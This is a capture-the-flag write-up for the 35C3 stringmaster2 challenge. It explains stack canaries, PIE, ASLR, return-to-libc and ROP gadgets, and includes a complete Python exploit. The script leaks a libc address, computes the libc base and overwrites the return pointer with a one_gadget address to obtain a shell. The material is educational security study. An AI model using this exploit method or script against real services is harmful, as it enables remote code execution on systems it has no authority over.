Introduction
Stringmaster2 is a continuation of the previous task, stringmaster1, which I covered here:
https://dbeef.lol/2019/01/27/my-35c3-ctf-writeup-iii-stringmaster1/
I recommend reading it first, since I’ll refer to it throughout this writeup.
What we find in the distrib folder this time is:
You may wonder why they would include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, to see what changed in the source from stringmaster1:
There are two differences:
- Code – There’s no spawn_shell function provided this time – we can’t dump its address and overwrite return pointer from the play function with it.
- Security measures – Binary is compiled with PIE and stack protector enabled.
PIE stands for Position Independent Executable. It is related to PIC (Position Independent Code), since PIEs are made entirely of PIC.
You can check Wikipedia for how it works; what it changes in the context of solving this CTF is:
- Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary, like we did in the 1996 task.
- We can’t just set a gdb breakpoint at a fixed address read from the binary, though we could work around that by recompiling our local stringmaster2 binary if we really wanted to do some inspection.
If the stack protector is enabled, another value, called a stack canary, is placed on the stack frame before the return address and (optionally) the saved frame pointer. A buffer overflow that redirects code execution, like the one in the 1996 writeup, overwrites bytes contiguously from some variable’s address on the stack up to the return pointer, so everything in between gets overwritten too, and the stack canary changes its value.
The compiler injects code that checks whether that value has changed and, if so, aborts the program to prevent exploitation.
You can read more about that on Wikipedia:
https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries
But the good news is that neither of them is an obstacle. As in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be touched unless we overwrite it deliberately. As for the PIE problem, we don’t have the spawn_shell function in the binary anyway, so we’ll need to return somewhere else. But where?
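To make the difference between the two kinds of write concrete, here is a toy model in Python. It is only a sketch and not the real binary: the frame layout, the sizes and every value in it (canary, frame pointer, return address) are invented for illustration.

```python
import struct

# Toy stack frame (all sizes and values are made up for this sketch):
# 16-byte buffer | 8-byte canary | 8-byte saved frame pointer | 8-byte return address
BUF_SIZE = 16
CANARY = 0x1122334455667700
CANARY_OFFSET = BUF_SIZE
RET_OFFSET = BUF_SIZE + 16


def make_frame():
    """Build a fresh toy frame as a mutable byte array."""
    return bytearray(
        b"A" * BUF_SIZE
        + struct.pack("<Q", CANARY)
        + struct.pack("<Q", 0x7FFC00001000)
        + struct.pack("<Q", 0x555500001234)
    )


def canary_intact(frame):
    """Mimic the compiler-inserted check done before the function returns."""
    return struct.unpack_from("<Q", frame, CANARY_OFFSET)[0] == CANARY


def linear_overflow(frame, payload):
    """Classic overflow: bytes are written contiguously from the buffer start."""
    frame[0:len(payload)] = payload


def targeted_write(frame, offset, value):
    """Arbitrary write: only the 8 bytes at the chosen offset change."""
    frame[offset:offset + 8] = struct.pack("<Q", value)


overflowed = make_frame()
linear_overflow(overflowed, b"B" * (RET_OFFSET + 8))
print("linear overflow, canary intact:", canary_intact(overflowed))

patched = make_frame()
targeted_write(patched, RET_OFFSET, 0x4141414141414141)
print("targeted write, canary intact:", canary_intact(patched))
```

The linear overflow has to run through the canary to reach the return address, while the targeted write skips over it, which is the situation the swap and replace commands put us in.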
Return to libc
The return-to-libc (ret2libc) technique is based on replacing the return pointer’s value with an address from the C library. It may be the execve function, the same one that was called in spawn_shell in stringmaster1, it may be any other function, or even a specific instruction within one of those functions!
Calling execve this way would involve overwriting (assuming, for simplicity, that the arguments are read from the stack):
- Return pointer, previously storing an address of a line in the main function, to which the call from play would return. It would be overwritten with the address of the execve function (8 bytes).
- The address after that would need to point to a literal with “/bin/sh” (where we would find it comes later): 8 bytes.
- Again, a pointer to a literal with “/bin/sh”: 8 bytes.
- Pointer to NULL, which would be 8 zeroed bytes.
- Again, pointer to NULL: 8 zeroed bytes.
Where can we find the address of execve?
Where can we find the “/bin/sh” literal I mentioned?
It’s in libc, just like execve, but how did it get there?
Let’s download libc sources and find out.
I got mine (version 2.27) from https://ftp.gnu.org/gnu/glibc/.
grep -rni . -e "/bin/sh" searches the current directory recursively for “/bin/sh”.
As you can see, there are some execve calls that take the const char literal “/bin/sh” as an argument, which means that those literals end up in the read-only data of the libc .so file, with a pointer to one of them passed as an argument whenever one of those specific calls happens.
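The same search can be run against the compiled library instead of the sources. The helper below is a minimal sketch: the function name is my own, and the demo runs on a few invented bytes rather than on a real libc, so that it works anywhere.

```python
def find_literal_offsets(blob, literal=b"/bin/sh\x00"):
    """Return every file offset at which the NUL-terminated literal occurs."""
    offsets = []
    start = 0
    while True:
        idx = blob.find(literal, start)
        if idx == -1:
            return offsets
        offsets.append(idx)
        start = idx + 1


# Invented stand-in for the contents of a shared library.
demo_blob = b"\x7fELF....some code....-c\x00/bin/sh\x00exit 0\x00"
for off in find_literal_offsets(demo_blob):
    print("found /bin/sh at file offset", hex(off))
```

To try it on the real thing, read the provided libc in binary mode and pass its bytes in, for example find_literal_offsets(open(path_to_libc, 'rb').read()), where path_to_libc is whatever path the libc from the distrib folder has on your machine. Keep in mind that this yields an offset in the file, which is not guaranteed to equal the offset from the load base in every section.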
Now that we know how to manually craft a call to execve with “/bin/sh” as an argument, I’ll tell you why we won’t do it in this case, though what we’ve learned will come in handy, since what we’ll really do is very similar.
See, when we did stringmaster1 last time, swapping bytes to make the return pointer hold the address of spawn_shell was very unstable: the program crashed at random, and we only tried to swap 8 bytes!
Swapping all the bytes of our manually crafted call stack would mean swapping 40 bytes, not to mention that we would need those 40, mostly different, values to be somewhere on the leaked stack (and that takes a lot of luck).
What if there were a way to jump directly to the place in libc where execve(“/bin/sh”) is called (already with the argument in place!), just as we’ve seen in the libc sources, without planting function arguments ourselves?
Return Oriented Programming
ROP is the technique I’ve just suggested: find some place in the existing code that you want to execute, get its address and jump to it. The places that can be jumped to are called ROP gadgets.
We won’t waste time finding one manually, since there is already a tool made specifically for finding execve gadgets (though I’ll write another post about this later). It’s called one_gadget and can be downloaded here:
https://github.com/david942j/one_gadget
After installation, we’ll call one_gadget with the path to our libc as an argument:
That’s it, we’ve been given 3 variants, each of which expects different register values at the moment of the call. We’ll use the first one, but it makes no difference to us which one we call.
Return to the plan
So we could use the same Python exploit we used before, just with a different value to put into the return pointer (this time the gadget instead of spawn_shell), couldn’t we?
Er, no. There’s one last thing I didn’t mention – ASLR, which stands for Address Space Layout Randomization.
The gadget’s address we just took from libc is only an offset: it counts the distance from the beginning of the .so file and nothing else (in this writeup and in the script I call it the “absolute” address).
It becomes a valid address only once we add the libc base address to it (the address at which libc is loaded in the process), and because of ASLR the base address changes every time we run the application!
See how the base address changes (ldd runs the program and prints the addresses at which libraries are loaded):
As an experiment, let’s temporarily disable ASLR and invoke ldd once again:
As you can see, this time the addresses don’t change. How easy it would be to exploit without ASLR! We could just take this permanent libc base address, add the offset of our gadget and run a Python script that changes the return pointer value.
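Besides ldd, on Linux the load address of every library of a running process can be read from /proc/<pid>/maps. The parser below is a rough sketch: the function name is my own, it assumes the usual six-column layout of that file, and the sample text (paths, inodes and addresses alike) is invented so that the example gives the same result everywhere.

```python
def libc_base_from_maps(maps_text):
    """Return the lowest start address of any mapping backed by a libc file."""
    bases = []
    for line in maps_text.splitlines():
        fields = line.split()
        # Expected columns: range, perms, offset, dev, inode, path
        if len(fields) < 6:
            continue
        name = fields[5].rsplit("/", 1)[-1]
        if name.startswith("libc.") or name.startswith("libc-"):
            start = int(fields[0].split("-")[0], 16)
            bases.append(start)
    return min(bases) if bases else None


# Invented sample in the format of /proc/<pid>/maps.
SAMPLE_MAPS = """\
555555554000-555555556000 r-xp 00000000 08:01 123 /tmp/demo
7ffff79e4000-7ffff7bcb000 r-xp 00000000 08:01 456 /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7bcb000-7ffff7dcb000 ---p 001e7000 08:01 456 /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7dd5000-7ffff7dfc000 r-xp 00000000 08:01 789 /lib/x86_64-linux-gnu/ld-2.27.so
"""

print("libc base in the sample:", hex(libc_base_from_maps(SAMPLE_MAPS)))
```

Feeding it the contents of /proc/self/maps from two separate runs of the Python interpreter should print two different bases while ASLR is on, and the same base twice while it is off.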
So how do we defeat ASLR?
Let’s have a closer look at what’s on the stack of a very simple program:
I’ve printed the first 20 addresses on the stack while stopped at a breakpoint in the main function. As you can see, we have plenty of addresses that refer to the C library!
The first one, __libc_csu_init, is the frame pointer in our stack frame; the second one, <__libc_start_main+231>, is the return pointer. The 231 part means that it points 231 bytes past the beginning of this function. So we return into a libc function, the one that called our main earlier, when bootstrapping the process!
If you want some details on why those addresses are there (not of much relevance for solving this task), you can see the answer I gave on Information Security Stack Exchange:
https://security.stackexchange.com/a/203313
The same thing happens in stringmaster2: we return to <__libc_start_main+231> too, and what’s nice is that this address is also present in stringmaster2’s leak.
Now it’s time to put the facts together:
- We need the libc base address (to which we’ll add the offset of our gadget)
- We have both the offset of <__libc_start_main+231> (from gdb) and its [base + offset] address (from the leak)
- So we can calculate the base address!
Our addresses:
__libc_start_main = 0x21AB0
__libc_start_main + 231 = 0x21B97
At which position will we find <__libc_start_main+231> in stringmaster2’s leak?
At the same one we used before: the 18th group of 8 bytes in the leaked data is the return pointer, and the program tries to return to <__libc_start_main+231>.
The final algorithm is the same as in stringmaster1, with one extra step before replacing the return pointer, because we need to calculate the value we will replace it with:
- Get the integer value of the 8 bytes starting at index (17 * 8) of the leaked byte array
- Subtract 0x21B97 from that value and assign the result to libc_base
- The bytes to write are those of [libc_base + gadget_addr]
That’s how ASLR can be defeated: by leaking some libc address whose target we know (<__libc_start_main+231> in this case).
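The three steps can be sketched in isolation, without any networking. The constants are the ones used in this writeup (0x21AB0 + 231 and the gadget offset 0x4f2c5 from the exploit script); the function name and the fake leak, including its libc base, are invented for the demonstration.

```python
import struct

RETURN_POINTER_INDEX = 17 * 8                 # 18th group of 8 bytes in the leak
LIBC_START_MAIN_231_OFFSET = 0x21AB0 + 231    # 0x21B97
GADGET_OFFSET = 0x4F2C5                       # gadget offset used in the exploit script


def gadget_address_from_leak(leak):
    """Return (libc_base, gadget_address) computed from the leaked stack bytes."""
    # The return pointer is stored little-endian, hence '<Q'.
    (leaked_ret,) = struct.unpack_from("<Q", leak, RETURN_POINTER_INDEX)
    libc_base = leaked_ret - LIBC_START_MAIN_231_OFFSET
    return libc_base, libc_base + GADGET_OFFSET


# Invented leak: zero padding followed by a return pointer into a made-up libc base.
fake_base = 0x7F1234567000
fake_leak = bytes(RETURN_POINTER_INDEX) + struct.pack(
    "<Q", fake_base + LIBC_START_MAIN_231_OFFSET
)

base, gadget = gadget_address_from_leak(fake_leak)
print("libc base:", hex(base))
print("gadget:   ", hex(gadget))
```

A cheap sanity check on a real leak is that the computed base should be page aligned (its lowest 12 bits are zero); if it is not, the leaked value was probably read from the wrong index.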
Final attack
This time I moved the part that sends commands into a Client class, but in essence the code is almost the same as for stringmaster1, apart from calculating the libc base.
import time
import struct
import socket


# For finding hex sequence in given subarray (i.e finding pointers' addresses by their supposed value)
def find_index_of_subarray(arr, subarr):
    index = 0
    for byte in arr:
        if len(arr) - index < len(subarr):
            return -1
        if byte == subarr[0]:
            # Checking if arrays are equal
            if arr[index:index + len(subarr)] == subarr:
                return index
        index += 1
    return -1


# For returning sub-bytearray of given length at given index of given bytearray:
def get_subarray_at_address(length, index, byte_array):
    if index + length > len(byte_array):
        return -1
    else:
        return byte_array[index:index + length]


# For finding byte index for given byte value in given array
# If found value but it is in protected line, pass this line.
def find_byte_index(byte_value, byte_array, protected_lines):
    index = 0
    for byte in byte_array:
        if byte == byte_value:
            not_protected_line = True
            for line in protected_lines:
                if (not (index < line * 8) and not (index > (line + 1) * 8)):
                    not_protected_line = False
                    break
            if not_protected_line:
                return index
        index += 1
    return -1


class Client:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    encoding = 'UTF-8'
    decode_error_handling = 'ignore'
    host = ''
    port = 0
    last_retrieved_bytes = bytearray(0)
    buffer_size = 512

    def __init__(self, host, port):
        self.host = host
        self.port = port

    def connect(self):
        self.sock.connect((self.host, self.port))

    def disconnect(self):
        self.sock.close()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def wait_for_any_input(self):
        print('\033[92m' + 'Waiting for any input.' + '\033[0m')
        self.last_retrieved_bytes = bytearray(0)
        buffer = self.sock.recv(self.buffer_size)
        for byte in buffer:
            self.last_retrieved_bytes.append(byte)
        input_as_string = buffer.decode(self.encoding, self.decode_error_handling)
        print(input_as_string)

    def wait_for_prompt(self):
        print('\033[94m' + 'Waiting for prompt.' + '\033[0m')
        self.last_retrieved_bytes = bytearray(0)
        input_as_string = ''
        retrieved_full_prompt = False
        ending_normal = 'quit \n> '
        ending_quit = 'You lost.'
        while not retrieved_full_prompt:
            buffer = self.sock.recv(self.buffer_size)
            self.last_retrieved_bytes += buffer
            input_as_string += buffer.decode(self.encoding, self.decode_error_handling)
            retrieved_full_prompt = \
                (input_as_string.find(ending_normal) != -1) or (input_as_string.find(ending_quit) != -1)
        print(input_as_string)

    def retrieved_bytes_truncate_prompt(self):
        beginning = 'Enter the command you want to execute:'.encode(self.encoding)
        index = find_index_of_subarray(self.last_retrieved_bytes, beginning)
        self.last_retrieved_bytes = self.last_retrieved_bytes[:index]

    def prettyprint_retrieved_bytes(self):
        offset = len(self.last_retrieved_bytes)
        line = 1
        string = ''
        # Don't worry, it's just an ANSI color code
        string += '\033[91m'
        while offset > 0:
            str_line = 'Line ' + str(line).zfill(3) + ': '
            if offset >= 8:
                for a in range(0, 8):
                    str_line += '0x' \
                                + hex(self.last_retrieved_bytes[a + (line - 1) * 8]).replace('0x', '').rjust(2, '0') + \
                                ' '
            else:
                for a in range(0, offset):
                    str_line += '0x' \
                                + hex(self.last_retrieved_bytes[a + (line - 1) * 8]).replace('0x', '').rjust(2, '0') + \
                                ' '
            string += str_line + '\n'
            offset -= 8
            line += 1
        string += '\033[0m'
        print(string)
        return string

    def send(self, command_bytearr):
        print('\033[92m' + 'Sending: ' + str(command_bytearr) + '\033[0m')
        self.sock.sendall(command_bytearr)

    def send_replace_overflow(self):
        self.send('replace X a\n'.encode(self.encoding))

    def send_replace(self, char_1, bytearr):
        command = ('replace ' + char_1 + ' ').encode(self.encoding)
        command += bytearr
        command += (' \n').encode(self.encoding)
        print('Sending: ' + str(command))
        self.send(command)

    def send_swap(self, index_1, index_2):
        self.send(('swap ' + str(index_1) + ' ' + str(index_2) + ' \n').encode(self.encoding))

    def send_print(self):
        self.send(('print\n').encode(self.encoding))

    def send_quit(self):
        self.send(('quit\n').encode(self.encoding))

    def send_ls(self):
        self.send(('ls\n').encode(self.encoding))


# 17 * 8 is end of the 17-th octet (counting from zero), so practically it's 18-th line
return_pointer_index = 17 * 8
libc_main_231_absolute = 0x21ab0 + 231

client = Client('localhost', 22225)
client.connect()
client.wait_for_prompt()
client.send_print()
client.wait_for_prompt()
client.send_replace_overflow()
client.wait_for_prompt()
client.send_print()
client.wait_for_prompt()
client.retrieved_bytes_truncate_prompt()
client.prettyprint_retrieved_bytes()

copy = client.last_retrieved_bytes
libc_main_231_subarray = get_subarray_at_address(8, return_pointer_index, copy)
libc_main_231 = struct.unpack('<Q', libc_main_231_subarray)[0]
print('libc_main_231_addr is : ' + str(hex(libc_main_231)))
libc_base = libc_main_231 - libc_main_231_absolute
print('libc base is: ' + str(hex(libc_base)))
gadget_int = 0x4f2c5 + libc_base
print('gadget is: ' + str(hex(gadget_int)))
gadget_bytes = struct.pack('>Q', gadget_int)
# time.sleep(2)

# Firstly, for every byte of gadget, put its value on the beginning of the leaked data
# to make these bytes present on the stack, so we could use swap command in the second next step.
offset = 0
for byte in gadget_bytes:
    copy = client.last_retrieved_bytes
    s = chr(copy[offset])
    bytearr = get_subarray_at_address(1, offset, gadget_bytes)
    client.send_replace(s, bytearr)
    offset += 1
    client.wait_for_prompt()
    client.send_print()
    client.wait_for_prompt()
    client.retrieved_bytes_truncate_prompt()
    # m.client.prettyprint_retrieved_bytes()

# Now, for every byte of gadget, swap its value with corresponding return pointer byte
offset = 0
for byte in reversed(gadget_bytes):
    print('Swapping: ' + str(hex(byte)))
    index = find_byte_index(byte, client.last_retrieved_bytes, [17])
    if index == -1:
        print('Index for ' + str(byte) + ' not found!')
        exit(-1)
    else:
        client.send_swap(return_pointer_index + offset, index)
        offset += 1
        client.wait_for_prompt()
        client.send_print()
        client.wait_for_prompt()
        client.retrieved_bytes_truncate_prompt()
        # m.client.prettyprint_retrieved_bytes()

print('Replaced all bytes for return pointer to libc_system')
client.send_quit()
client.wait_for_prompt()
client.send_ls()
print('This should be shell.')
client.wait_for_any_input()
print('Retrieved bytes counter: ' + str(len(client.last_retrieved_bytes)))
print(client.last_retrieved_bytes.decode('utf-8'))
Summary
So far, this was the most complex task, since it involved:
- Knowing how libc bootstraps processes: their flow starts not in your main function but in __libc_start_main, which then redirects the flow to your main, and when your main returns, execution ends up back at <__libc_start_main+231>.
You can read more on that on this excellent blog:
http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html
- Knowing that, because of ASLR, you can’t just use an address extracted from libc without knowing the base at which libc is loaded in the current process instance.
- Knowing about ROP gadgets, since crafting a call stack for execve by yourself is too unstable to work with given commands (swapping/replacing bytes on stack).
Resources
If you’re curious how a process can use libc at a different address on every run while its own code does not change, read about the Global Offset Table and the Procedure Linkage Table:
https://en.wikipedia.org/wiki/Global_Offset_Table
Also, I’ll have a look at this:
https://github.com/Gallopsled/pwntools
since it looks popular and will probably make solving CTFs easier.